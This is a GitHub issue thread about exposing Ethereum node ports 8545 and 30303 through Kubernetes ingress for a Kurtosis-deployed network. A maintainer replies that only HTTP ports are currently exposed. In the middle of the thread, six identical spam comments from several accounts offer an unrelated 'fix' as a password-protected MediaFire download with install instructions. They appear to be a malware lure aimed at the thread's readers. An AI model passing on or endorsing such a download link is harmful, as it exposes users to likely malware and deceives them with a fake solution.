### ISSUE TITLE
Ingress configuration for 8545 port

### ISSUE THREAD

**Issue by agj017** [ethpandaops/ethereum-package#753]
I have made ethereum network using kurtosis package on k8s cluster. I can see ingress of peer like below. 

```sh
kubectl describe ingress el-1-geth-teku -n {namespace}
Name:             el-1-geth-teku
Labels:           kurtosistech.com/app-id=kurtosis
                  kurtosistech.com/enclave-id=fb6c90f1bc98488dbe58d2a0abda796e
                  kurtosistech.com/guid=b44b7ed8aaf749d88a9676d3fc1b9f32
                  kurtosistech.com/id=el-1-geth-teku
                  kurtosistech.com/resource-type=user-service
Namespace:        {namespace}
Address:
Ingress Class:    <none>
Default backend:  <default>
Rules:
  Host                            Path  Backends
  ----                            ----  --------
  9001-b44b7ed8aaf7-fb6c90f1bc98
                                  /   el-1-geth-teku:9001 (192.168.170.59:9001)
Annotations:                      traefik.ingress.kubernetes.io/router.entrypoints: web
Events:                           <none>
```

As you see, the ingress is configured only for 9001 port. Actually I need to use 8545, 30303 port. I cannot find how to set that in `network_params.yaml`(https://github.com/ethpandaops/ethereum-package?tab=readme-ov-file#configuration). How can I do that?

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by agj017** [comment]
Can you answer my issue? @barnabasbusa

**Comment by barnabasbusa** [comment]
This is currently not possible. Current kurtosis engine exposes [http ports only. ](https://github.com/kurtosis-tech/kurtosis/blob/f7975163155264c4d62a11e42697b723cc568ca3/container-engine-lib/lib/backend_impls/kubernetes/kubernetes_kurtosis_backend/user_services_functions/start_user_services.go#L954)

Would need to make an issue on the kurtosis engine's repo for this potential ask, to also create an ingress for possibly all services.
